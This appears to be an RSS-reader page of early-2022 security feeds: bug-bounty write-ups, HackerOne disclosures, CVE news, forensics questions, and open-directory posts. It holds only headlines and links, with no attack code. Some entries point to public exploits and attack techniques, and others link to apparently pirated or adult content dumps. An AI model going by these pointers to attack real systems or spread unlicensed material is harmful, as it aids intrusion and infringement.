    Every hacker would have come across this, the first bounty. I can’t actually explain how it feels but I know that most of you can… Continue reading on Medium »  ( 5 min )
  • Open

    Index pages from 973-eht-namuh-973
    https://www.973-eht-namuh-973.com/search-pages/ https://www.973-eht-namuh-973.com/coloured%20site/ https://www.973-eht-namuh-973.com/Black%20and%20White/ https://www.973-eht-namuh-973.com/images/ https://www.973-eht-namuh-973.com/rotators/ https://www.973-eht-namuh-973.com/Alchemy/ https://www.973-eht-namuh-973.com/Magick/ Let me know if there’s others I missed. submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
    Animated movies (sorry if repost)
    submitted by /u/lostsquanderer [link] [comments]
    Large folder of videos pertaining to game design
    http://mirror.reenigne.net/gdc/ submitted by /u/inoculatemedia [link] [comments]
    Old gramophone records
    http://oldgramophonerecords.co.uk/4y1/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Multiple vulnerability leading to account takeover in TikTok SMB subdomain.
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1404612 - Bounty: $999
  • Open

    Recycle bin conundrum
    Have a read only external USB device with a copy of an imaged recycle bin. Goal is to pass off SUB to attorney for review of recycle bin $R files. WIN10 forensic laptop (A) recycle bin is empty, no software running. When plugged into forensic laptop, I can navigate via File Explorer to the recycle bin folders and files. I can open the $R files and SID of user for 2 user accounts. I properly eject SUB and connect to another laptop (B) before passing off to attorney. Laptop (B) is my day to day use laptop. The recycle bin on laptop (B) is empty. Laptop (B) is a WIN10 machine. When I plug SUB into laptop (B) and navigate to recycle bin files, no SIDs, instead recycle bin icons. When I click on the recycle bin icons, no contents. Any ideas on how to resolve this ? submitted by /u/ATXChimera [link] [comments]  ( 1 min )

  • Open

    Newbie investigating hdd
    Hello there, recently acquired some used HDD to try forensics as a student in cyber security. I'm using Kali Linux in forensic mode. Have a few questions : 1) Can using fdisk -l or parted -l modify data on the hdd ? (both launched as root) What about gparted ? (if not touching anything oc) 2) Working as root, is chmod a-w /dev/sde (the drive "location") really useful, like will it really prevent any write even from root ? 3) Created an image with dcfldd, asked for sha1 checksum, and before imaging used sha1sum on /dev/sde. They match. Do anyone work another way ? 4) Tried to import the image on autopsy with different settings but no file or anything else found. Then successfully linked to /dev/loop1 using losetup, but could not mount the "partition" (no filesystem nor partition is detected with parted -l, but gparted tells sde is an ataraid partition). Had some error like "unknown filesystem type 'ddf_raid_member'", so after a bit of digging tried some stuff with mdamd, but did not work. Any idea ? submitted by /u/ner00n [link] [comments]  ( 2 min )
    Creating Encase Image of Macbook Pro Max (A2485)
    Hi everyone, ​ I want to create an encase-image from a MacBook (Model A2485, M1 Max) but any of my attempt so far just have failed. Password is known and I have physical access to the device. Following things I allready tried: - boot external usb with Paladin Edge -> failed to boot from it (tried to allow Booting from external sources via recovery, but there was no option for enabling) - put the MacBook into targetdisk mode an connected it to another iMac -> tried to create an image via ewfaquire but the shared disk wasn't an extra device (or I failed to see it) - boot external usb with Paladin Edge on another iMac, put the MacBook into targetdisk mode an connected it to the iMac -> Paladin Edge doesn't recognize the shared disc My last idea is just to do a timemachine backup from the macbook to a clean / wiped hdd and create an encase image from it ... Does someone have any other ideas? Would be very happy about any suggestions! Thanks in advance! submitted by /u/frcGuy81 [link] [comments]  ( 2 min )
  • Open

    Inside Trickbot, Russia’s Notorious Ransomware Gang
    submitted by /u/CyberMasterV [link] [comments]
    New Hybrid Campaign OiVaVoii Uses Malicious OAuth Apps | Cyware Hacker News
    submitted by /u/ITlocknkey [link] [comments]
    Using PwnKit-Hunter to check for CVE-2021-4034 Vulnerable Systems
    submitted by /u/jat0369 [link] [comments]
    Remote root vulnerability for Samba (CVE 2021-44142)
    submitted by /u/lormayna [link] [comments]  ( 1 min )
  • Open

    Twitter stores original account names, dox vulnerability via Twitter Spaces
    Article URL: https://twitter.com/tszzl/status/1488466979799265281 Comments URL: https://news.ycombinator.com/item?id=30169435 Points: 31 # Comments: 1  ( 1 min )
    Arbitrary code execution vulnerability in Samba
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30166148 Points: 3 # Comments: 0  ( 1 min )
    High severity vulnerability in Element Desktop 1.9.6 and earlier
    Article URL: https://matrix.org/blog/2022/01/31/high-severity-vulnerability-in-element-desktop-1-9-6-and-earlier/ Comments URL: https://news.ycombinator.com/item?id=30163784 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SQL injection at /admin.php?/cp/members/create
    ExpressionEngine disclosed a bug submitted by khoabda1: https://hackerone.com/reports/968240
    Information disclosure-Referer leak
    Brave Software disclosed a bug submitted by kkarfalcon: https://hackerone.com/reports/1337624 - Bounty: $500
    The Return of the Grinch
    h1-ctf disclosed a bug submitted by w31rd0: https://hackerone.com/reports/1433581 - Bounty: $1000
    Saving Christmas from Grinchy Gods
    h1-ctf disclosed a bug submitted by akshansh: https://hackerone.com/reports/1434017 - Bounty: $1000
    Full Response SSRF via Google Drive
    Dropbox disclosed a bug submitted by bugdiscloseguys: https://hackerone.com/reports/1406938 - Bounty: $17576
    Reflected Xss On https://vk.com/search
    VK.com disclosed a bug submitted by b4walid: https://hackerone.com/reports/1454359 - Bounty: $500
  • Open

    [Question] How are these directories discovered? Is it random web-surfing then sharing? Or do some of you use crawlers?
    Basically says it all in the title! I just found this sub-reddit, VERY COOL! I am a /r/datahoarder and I appreciate this sort of thing! I am just curious to how these open directories are discovered. Thanks all for being apart of this community! submitted by /u/cs_legend_93 [link] [comments]  ( 1 min )
    Does anyone have OD-Shots uploaded in 2019 and 2020?
    I'm looking for .xlsx files that were posted in 2019/2020 on this sub, because the links that were uploaded are now dead. Does anyone saved them and can upload them once again? Again, i'm not looking for last upload but files that were shared earlier. submitted by /u/GingrFattyJesusFreak [link] [comments]  ( 1 min )
    Filechef not working???
    Does anyone know if https://www.filechef.com/ is down??? submitted by /u/klutz50 [link] [comments]
    photos and documents relating to Russian involvement in Ukraine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    high res images of Russian dairy products
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    No Rate Limiting on OTP sending
    Firstly I would like to say that this is my first ever writeup for the InfoSec community and I may not be so good at presenting the… Continue reading on Medium »  ( 2 min )
    Theoretical Bugs With No Impact Don’t Get Paid — Here’s Why
    As a whitehat, it’s easy to want to submit as many bugs as possible to a project — especially projects on Immunefi, because the bounties… Continue reading on Immunefi »  ( 2 min )
    H1-CTF Hacky Holidays Writeup
    Hey everyone i hope you all are fine and doing good, In December Hackerone made a 12 day 12 level CTF called Hacky-Holidays which had 12… Continue reading on Medium »  ( 8 min )
    My experience of Hacking The Dutch Government
    Hi Everyone! , Continue reading on Medium »  ( 2 min )
    OSINT Tips for Penetration Testing
    In this article, we will discuss some of my favorite OSINT techniques that can help during your penetration testing activities. Continue reading on Medium »  ( 1 min )
    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022! Continue reading on InfoSec Write-ups »  ( 2 min )
    Password Spraying Attack
    Hello everyone! 🎉 Continue reading on Medium »  ( 1 min )
    A Peculiar Case of XSS and my first bug
    Hello everyone, I am new to security stuff and will share how I was able to get few XSS in not so common way. Continue reading on Medium »  ( 1 min )
    IDOR vulnerability on invoice and weak password reset leads to account take over
    This year I started doing bug bounties and I only got valid p5 report and my report for p4 and p3 got rejected. Continue reading on Medium »  ( 3 min )
    Understanding Automation in Bug Bounty
    ==UNDER CONSTRUCTI Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Continue reading on Medium »
  • Open

    Question on using VMware pro and Nessus, isolating one VM from communication with internet.
    I need help running vuln scan using vm workstation pro and Nessus :/ Looking for advice/help on vuln. scanning using VMware workstation pro and Nessus Hey folks!!! I am looking to run Nessus on one VM, and run the vulnerability scan on a second VM. My constraints are that the VM running Nessus should be able to access/communicate out to the internet, while the VM being scanned should not be able to communicate to the internet — it should only be able to communicate with the VM performing the Nessus scan. I tried setting up both VMs on a host only VMnet, but Nessus was not able to get or use certain plugins that way. I’m looking for any help or advice setting this up how I described as I have not been successful. Thanks in advance for any help! submitted by /u/enki0817 [link] [comments]  ( 1 min )
    IRM/document encryption... Why isn't it used more?
    I'm a MS:CS student taking some cybersecurity classes. We learned about IRM, basically symmetrically encrypted documents with the keys managed by a central server backed via AD or whatever the org uses for AAA. It sounds pretty useful for dealing with vendors and helping deter exfiltration (and as a bonus, leaked docs encrypted at rest can't easily be used to extort ransoms), but it doesn't sound like very many places use it. Are the downsides of cost, difficulty of use for the the user, and vendor lock-in a deal breaker for a lot of enterprises? Is the prevailing view that since someone can still take pictures of the screen with their phone, it's not worth the effort? Or that this kind of threat isn't considered to be very serious? What other real world issues am I not considering? Cheers submitted by /u/berrmal64 [link] [comments]  ( 4 min )
    Help me guys
    I have downloaded 2 photo recovery apps from playatore into my phone. But I am scared that they might be fake apps which steals photos. I have checked the privacy policy in which it was statated that The information that I request will be retained on your device and is not collected by me in any way. But now im not sure whethet i can trust them. The apps seem to be fake with manipulated reviews. Where would all my photos go to if they are sus apps? Do you guys think that they are sus apps by high chances? It would be nice if I get replies... Thank you! submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    Has my NVR been hacked?
    Was just looking at my IDS alerts on my pfSense router and noticed the following entries seen in the screenshot here https://imgur.com/a/AMfpMaH. I've done a whois on some of the source IP addresses and they're questionable, to say the least. The device in question is a Hikvision NVR. My main concern is, has my NVR been hacked and turned into a TOR relay/exit node? Is there anything I can do to test this? I also want to point out that I don't have any ports opened facing the internet for this NVR which is also a bit weird as I thought that would offer me more protection! TIA submitted by /u/Bosshogg226 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Solidity Audit & Ethereum Smart Contract Analysis using Mythril - Blockchain Security #2
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    what is Steganography? where it is used? Steganography in CTF’s  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    Ctf info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    RCE in Samba(CVE-2021-44142)
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30158662 Points: 3 # Comments: 0  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    TheHuzz: Instruction Fuzzing of Processors Using Golden-Reference Models
    Article URL: https://arxiv.org/abs/2201.09941 Comments URL: https://news.ycombinator.com/item?id=30156948 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Analyzing Malware with Hooks, Stomps and Return-addresses
    submitted by /u/jat0369 [link] [comments]
    Don't trust comments
    submitted by /u/crower [link] [comments]
    RCE and Auth Bypass in Aqua Illumination Hydra Series Aquarium Lights
    submitted by /u/laransec [link] [comments]
    Reverse Engineering 3201: Symbolic Analysis
    submitted by /u/OpenSecurityTraining [link] [comments]
    A story of leaking uninitialized memory from Fastly
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    TrendNET AC2600 RCE from the Internet
    submitted by /u/dinobyt3s [link] [comments]
  • Open

    Lots of movies, TV shows, and top shelf porn
    192.64.86.228 submitted by /u/inoculatemedia [link] [comments]
    Movies, Documentaries, music, TV Series etc
    Quite a handful of TV Shows, Movies, Documentaries etc. Some content may be NSFW. ​ http://188.165.227.112/portail/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
  • Open

    Cyber Investigator OSINT CTF “Crime Scene Investigation” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT, forensics, and investigation challenges. Continue reading on Medium »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 02
    After having so much fun solving Hacktoria’s Geolocation — 01 challenge yesterday, I have decided today to go for the 2nd challenge. Here… Continue reading on Medium »  ( 5 min )
    Quiztime — Random OSINT Challenge 7
    On Jan 12, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and… Continue reading on Medium »  ( 1 min )
    What is OSINT?(Part 1): A practical introduction!
    This article was written in collaboration with the marvelous Aardwarewolf Continue reading on Medium »  ( 17 min )
    What is OSINT? (Part 1)
    A practical introduction Continue reading on Medium »  ( 16 min )
    Investigating Russian Number Plates
    Russian number plates come in a variety of shapes and sizes and can reveal interesting information regarding the owner of a target vehicle… Continue reading on Medium »  ( 3 min )
  • Open

    Multiple firewall layers - are they necessary?
    I was sitting around today pulling my hair out at the prospect of automating rulebases, objects, etc across the separate vendors we use for our edge and internal firewall. Then the question hit me - why do we even have an internal firewall? Our edge FW is a Palo capable of everything the internal FW does and then some. So why can't I simply take everything hanging off the internal FW, move it to the edge FW, and save some money while making my life much easier? The only things I can come up with that we lose are vendor diversity and physical separation. Am I crazy or missing something? If not - would I even gain anything out of VIRTUALLY splitting those firewalls via different vsys on the Palos (I imagine not)? Thanks! submitted by /u/difflx2112 [link] [comments]  ( 4 min )
    Modbus Traversal?
    My company has an air\gas utility monitor that's connected over cellular back to the utility provider for monitoring and reporting. Currently isolated from anything else. Our Facilities team want to put a modbus TCP device on it for our own internal monitoring and reporting. Anyone have experience with this sort of setup? If someone were to gain access to the utility monitor over cellular could they then utilize modbus to control and traverse our network through the modbus\TCP gateway? submitted by /u/ThePaulHarrell [link] [comments]  ( 2 min )
    Any special tips for a soon to be CISO?
    Hello, I'm about to become the CISO for a school I'm pretty confident on what I should do and what should be my first steps but I would like to know if any of you have any uncommon tips? Any good podcast/news source for example ? ​ Thanks ! submitted by /u/elminstor [link] [comments]  ( 4 min )
    Computer and phone security
    1) Thank you all for your suggestions on my former question. Id like to ask about some ways to secure an Android phone and a Windows computer. I am specifically looking for software and/or prefered settings to block intrusions from physical and wireless access in 2 scenarios 1) Someone gets the phone/computer physically and 2) Someone accesses it wirelessly. Id like to know what to do so the data are unreadable (Preferably encrypted) in scenario 1 while still keeping the phone/computer capable of basic functioning and so the phone/computer is harder to get into for attackers in (or before) scenario 2. Lets assume both devices are up-to-date with antivirus and firewall (When applicable). Id like to know the best method even if it means going around some hidden functions of the devices submitted by /u/O-0111 [link] [comments]  ( 1 min )
    Descriptive logic in Mobile Security
    Hi everyone! I'm a cybersecurity student and want to ask a slightly "stupid" question. In my program, there is a subject "Mobile security" where I was given the task to read a descriptive logic book of 500+ pages. So I wanted to ask, what does descriptive logic have to do with Mobile Security? Do you need to know and study this science to ensure the security of an application? submitted by /u/_hanabi_n [link] [comments]  ( 1 min )
    [MFA] Could a managed laptop count as a possession factor?
    Hi, I am supposed to secure a remote connection of company laptops with two factors. The devices are managed by Intune with conditional access. You need a company managed device to connect to the company network. Do you think that per definition the managed device with conditional access could count as a possession factor in a multi-factor authentication? Wikipedia says about the possession factor Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. One could argue that the device itself could count as a possession. It's not personalized but you still require one device out of a few hundred and one set of credentials to establish a connection. submitted by /u/Vertripper [link] [comments]  ( 4 min )
    Discovered IDOR vuln that reveal vaccination records
    Hello NetSec, Upon receiving my vaccination record, I discovered that I was able retrieve other vaccination records along with other patient data by simply incrementing url values. Worst part is that you can retrieve these records without being authenticated. The application initially authenticate patients to retrieve the records but, I found out you can reach the URL without being authenticated. Looking for suggestions to responsibly disclose this issue to the laboratory. I'm sure this is a violation of hipaa. submitted by /u/nocmd [link] [comments]  ( 2 min )
    Career advice request
    I’m currently a web application developer going on 10 years now. I also have 7 years in systems and network administration. I’ve always wanted to get into cybersecurity, but with so many roles out there, most asking for several years in security, I’m not sure what I’m actually qualified for. Over the years my networking knowledge and muscle memory have depleted, and perhaps feeling a bit imposter syndromey. The last server OS I supported was Windows Server 2003 so you could say I’m not up to speed on latest tech in the greater IT sphere. Also, I’m in my early 40s if that matters at all. Just looking for some general advice as to what, if anything, I should target my job search around. I’m definitely up to refresh/update my current skills with courses or whatever providing it makes sense to even pursue at this stage in my career. Thanks I’m advance. submitted by /u/zushazero [link] [comments]  ( 1 min )
  • Open

    How I approached Dependency Confusion!
    Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs. Continue reading on Medium »  ( 1 min )
    XSS Discovery and Exploitation With BurpSuite
    I’ve recently completed TryHackMe’s cross-site-scripting room and PortSwigger’s XSS labs and here’s what I’ve learned! This piece assumes… Continue reading on Medium »  ( 4 min )
    rDEX Bug Bounty
    Overview Continue reading on Medium »  ( 3 min )
    Vulnerability Capstone — Tryhackme
    Vulnerability Researching Continue reading on Medium »  ( 1 min )
    How I was able to buy a product for free — $$$
    Hi everyone, I hope you are good. It’s been a long time I haven’t write again. So in this article I will share about my finding.. Continue reading on Medium »  ( 1 min )
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »  ( 3 min )
  • Open

    SecWiki News 2022-01-31 Review
    SecWiki周刊(第413期) by ourren 配置错误注入测试中的挑战与机遇 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Vulnerability in PostBus public transport platform exposed customer data
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-postbus-public-transport-platform-exposed-customer-data Comments URL: https://news.ycombinator.com/item?id=30147933 Points: 1 # Comments: 0  ( 3 min )
    Inspector-gadget: exploit for a vulnerability in the Linux USB Gadget
    Article URL: https://github.com/szymonh/inspector-gadget Comments URL: https://news.ycombinator.com/item?id=30146403 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Puzzling RDP Cache - Putting the Pieces Together
    Good morning, It’s time for a new 13Cubed episode! Let's take a look at an easier way to reassemble RDP bitmap cache. And, if you're a little rusty on where to find the cache and how to export it, we'll cover that too! Episode: https://www.youtube.com/watch?v=9P845AMjJF0 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Failed GNFA looking for tips and any advise for better learning in a better way
    Just failed my GNFA and i feel really bad; Anyone can help me out for any mental boost up by advising how i could be better in next go. submitted by /u/xray_icon [link] [comments]  ( 3 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    สาวแซ่บแบ่งรายได้จากคลิปเสียวใน OnlyFans ช่วยทหารผ่านศึก พร้อมเผยฝันอันยิ่งใหญ่
    เดลี่สตาร์ รายงานเรื่องราวของ คามี่ สเตรลล่า สาวแซ่บดาวเด่นบนแพลตฟอร์มสำหรับผู้ใหญ่อย่าง OnlyFans ที่เปิดเผยถึงความฝันในอนาคต… Continue reading on Medium »

  • Open

    Archive of software for the Tandy Radio Shack - TRS-80 Model III
    http://cpmarchives.classiccmp.org/trs80/Software/Model%20III/ circa 1979 submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    PDFs on Food science
    PDFs on Food safety, handling, manufacturing, storage, processing etc... ​ http://154.68.126.6/library/Food%20Science%20books/ submitted by /u/amritajaatak [link] [comments]
    Some Engineering Company website Back end
    Appears to be the back end FTP server of an engineering company website. no clue if its any useful or not. Maybe it is? ​ https://elsmar.com/pdf_files/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Some ODs doesn't show up in Reddit search but when trying to post, it says that it have been posted by someone?
    Lets take this NSFW OD for example: https://pmagazine.co/wp-content/uploads/ One result show up if I search for the domain. I decided to try to post it anyway since the URL he posted doesn't work anymore. When I tried to post there's a message about a duplicate post from a totally different user with the same URL. Why didn't that one show up when searching for "pmagazine"? There should be at least 2 results but only 1 is showing. submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Tranny hardcore videos (NSFW. Not my thing but who am I to judge)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    Building Custom Empire Modules
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    How do you get open-source releases of vulnerabilities and other cyber threat news?
    It seems like Twitter is the answer, but I'm curious if I'm missing some sort of centralized hub for this kind of information that is free of unimportant information. What do you personally use? submitted by /u/Hymnosi [link] [comments]  ( 1 min )
    Can you "DDOS" someone through their public IP without being connected to each other in any way?
    A friend came up to me and told me that someone was "DDOSing" him. He said he got his computer IP from a video game server and he "DDOsed" him. How could he tell? He said he noticed packet loss and he had a higher ping and it disconnected him from Discord or something, they were in a call the whole time when it happened. My friend changed his PC public IP with some Windows settings after that. Now my friend believes that this guy is some big brain hacker and I can't convince him he is not, I don't want him to believe that this guy is in control of his security. Would also love to know what exactly happened and what this script kiddie could've. submitted by /u/AnnoyingN-wah [link] [comments]  ( 2 min )
    Whats the best way to secure 1) An Android phone 2) A Windows PC and 3) Home and company network?
    Hello! Id like to know how to secure an Android phone (even if it means gaining root access) while keeping basic usability 2) How to secure a Windows computer against outside attacks (also while keeping basic functionality) 3) How to secure a home and company network against attacks and data leaks submitted by /u/O-0111 [link] [comments]  ( 2 min )
    [Serious] How Fast would Quantum Computers Crack Passwords/Tokens/Logins?
    From this video I watched from my Youtube feed, I'm aware of that quantum computers would be extremely fast in computing speed, but how fast would they be able to crack things that are say: Passwords 20, 50, 100 random-characters long with just ASCII input Passwords 20, 50, 100 random-characters long that utilize ASCII, Unicode, and non-standard characters The two same concepts above, but with random words like "water", "trampoline", etc. dropped randomly into the passphrases so it's just not jumbled, and requires a full dictionary of words to crack. Randomized session-login tokens, like used for Discord, Google, browser cookies in general. Weak, typical username + password combinations used for things like social media where both are shorter than 10 characters generally. Edit: T…  ( 5 min )
  • Open

    Intro to Embedded RE Part 3: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]  ( 1 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    submitted by /u/Most-Loss5834 [link] [comments]  ( 3 min )
  • Open

    How to find locations to check for Russian military build-up?
    Methods for Investigating where Russian troops accumulated along Ukraine border Continue reading on Medium »  ( 4 min )
    Walkthrough —Hacktoria: Geolocation 01
    I came across the Hacktoria website today whilst looking for OSINT information. If you navigate to “Practice” — “Geolocation” you’ll come… Continue reading on Medium »  ( 3 min )
    Why we must nurture positive ethics in “citizen-driven” OSINT
    As citizen-driven open source intelligence (OSINT) grows in popularity, so does the risk of techniques being used by bad actors. I outline… Continue reading on Medium »
  • Open

    Spare GCFA Practice
    Hey all Anyone here have a spare GCFA practice they could wing this way ? Despite multiple content run throughs and a comprehensive index, I flunked both my practice exams :S Second fail was surprising as I felt confident ! 2 weeks left now until the real thing so hoping some more turbo study and another practice may boost the confidence. Cheers ! submitted by /u/Gumps903 [link] [comments]  ( 1 min )
    Do the SANS Live Classes just reuse the slides from the book or do they have other slides to use during class time?
    Thanks! submitted by /u/curiousgal1996 [link] [comments]  ( 1 min )
    Recover Historical Firewall Logs
    Hi all, This relates to a computer running Windows 10 home. Several months ago a program made a request to make an outbound connection. This request was probably blocked by the default firewall. I would like to note any info about this request, particularly the date and time, but firewall logging was off. Is there somewhere else this would be stored? Thank you, and I'm sorry if this is the wrong forum for this. submitted by /u/KoosOomakey [link] [comments]  ( 1 min )
  • Open

    My Bug Bounty Adventure -2-
    Greetings everyone from the Promentorium bosporium. Continue reading on Medium »  ( 2 min )
    DARPA’s quest for the (almost) unhackable
    Welcome to Changelog by README! I’m your host, Blake Sobczak. Every Sunday, I’ll deliver cybersecurity news and analysis to your inbox… Continue reading on README_ »  ( 4 min )
    How I hacked my way to the top of DARPA’s hardware bug bounty
    Go inside one of the most technically challenging bug bounties ever with the researcher who subverted secure hardware designed by MIT and… Continue reading on README_ »  ( 9 min )
    How i exposed the teacher’s Aadhaar card,bank details in the college website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 1 min )
    All About CSRF Flaw
    Continue reading on InfoSec Write-ups »  ( 2 min )
    Docker: From a beginner's perspective
    Docker is actually a docker engine that is used to create containers. Containers can be considered as VMs, but these VMs don’t have any… Continue reading on Medium »  ( 6 min )
    Price Tampering | Buying T-Shirts at 2 INR
    Hello Weirdos!!! Today I am going to share a write-up on a weird price tampering vulnerability I found a few months ago(currently patched). Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - OS COMMAND INJECTION LAB ÇÖZÜMLERİ
    OS Command Injection, bir web uygulama sunucusunda, saldırganın rastgele işletim sistemi (OS) komutları çalıştırmasına ve uygulama… Continue reading on Medium »  ( 4 min )
    How to get started hacking django applications
    Django is a python based web framework. In this writeup, i will teach you how to analyze django based applications . For this writeup, i… Continue reading on Medium »  ( 4 min )
  • Open

    Critical full compromise of jarvis-new.urbanclap.com via weak session signing
    Urban Company disclosed a bug submitted by ian: https://hackerone.com/reports/1380121 - Bounty: $1500
    No character limit in password field
    UPchieve disclosed a bug submitted by tomyway: https://hackerone.com/reports/1462175
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    SecWiki News 2022-01-30 Review
    威胁想定分析框架 by ourren wJa (D&S&I)AST 工具 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    网信办公布网络关键设备和网络安全专用产品安全认证和检测结果
    1月29日,中央网信办官网发布了2022年1号公告《关于统一发布网络关键设备和网络安全专用产品安全认证和安全检测结果的公告》。

  • Open

    JAVA ON EARTH [KNIGHT-CTF]
    Given Data: Continue reading on Medium »  ( 2 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    xeuldoc: Fetch information about any public Google document
    Introduction Continue reading on Medium »  ( 1 min )
    קורס אוסינט בסיסי
    קורס OSINT בסיסי — חיפושים ברשת למתחילים — סילבוס Continue reading on Medium »  ( 1 min )
    Finding the author of an illustration
    A while ago I spotted an image on reddit that really struck with me. I immediately knew I wanted to use it as my profile picture… Continue reading on Medium »  ( 2 min )
    In the beginning there was a tweet
    For the past year and a half I have been very interested in a career change into the cyber security and ethical hacking industry. I have… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 6
    On Jan 13, 2022, Quiztime (contributor @N_Waters89) shared a new OSINT quiz with us. The objective simple. We had to figure out where and w Continue reading on Medium »  ( 2 min )
  • Open

    Windows vulnerability with new public exploits lets you become admin
    Article URL: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/ Comments URL: https://news.ycombinator.com/item?id=30130902 Points: 7 # Comments: 0  ( 4 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
    NMAP Vulnerability Scanning Scripts
